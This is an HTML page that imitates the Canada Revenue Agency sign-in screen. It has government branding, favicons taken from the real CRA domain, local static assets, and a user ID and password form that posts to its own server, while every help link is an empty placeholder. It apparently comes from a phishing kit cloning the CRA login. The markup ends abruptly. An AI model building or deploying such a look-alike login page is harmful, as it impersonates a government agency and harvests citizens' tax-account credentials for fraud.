<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Canada Revenue Agency - CRA Sign In</title>
    
    <!-- Favicon links -->
    <link rel="apple-touch-icon" sizes="57x57 72x72 114x114 144x144 150x150" href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon-mobile.png">
    <link rel="icon" href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon.ico" type="image/x-icon">
    
    <!-- CSS files -->
    <link rel="stylesheet" href="../static/css/theme.min.css">
    <link rel="stylesheet" href="../static/css/common.css">
</head>
<body>
    <header>
        <div class="container">
            <div class="row">
                <div class="brand col-xs-9 col-sm-5 col-md-4">
                    <img alt="Government of Canada" src="../static/images/sig-blk-en.svg" property="logo">
                    <link property="logo" href="../static/images/wmms-blk.svg">
                </div>
            </div>
        </div>

        <div id="brand-container-cra">
            <div class="container">
                <div class="row">
                    <div class="col-xs-12 col-sm-10" id="brand-text-cra">
                        Canada Revenue Agency
                    </div>
                </div>
            </div>
        </div>
    </header>

    <div class="container">
        <div class="box">
            <h1>CRA Sign In</h1>
            <form method="POST">
                <label class="required" for="username">User  ID <strong class="required"><i>(required)</i></strong></label>
                <input type="text" name="username" id="username" class="form-control" required>
                <p><a href="#">Forgot your user ID?</a></p>
            
            
                <label class="required" for="password">Password <strong class="required"><i>(required)</i></strong></label>
                <input type="password" name="password" id="password" class="form-control" required>
                <p><a href="#">Forgot your password?</a></p>
            
           

                <p>For more information on how your privacy is protected, refer to our <a href="#">Personal Information Collection Statement</a>.</p>

            
                <button type="submit" name="Sign In" class="btn btn-primary">Sign In</button>
                <button type="submit" name="Exit" class="btn btn-default">Exit</button>

            </form>
        </div>
                
        
        <p>To <a href="#">register</a> if you are a new user.</p>
        <p>To <a href="#">revoke or change your CRA user ID
    </div>
</body>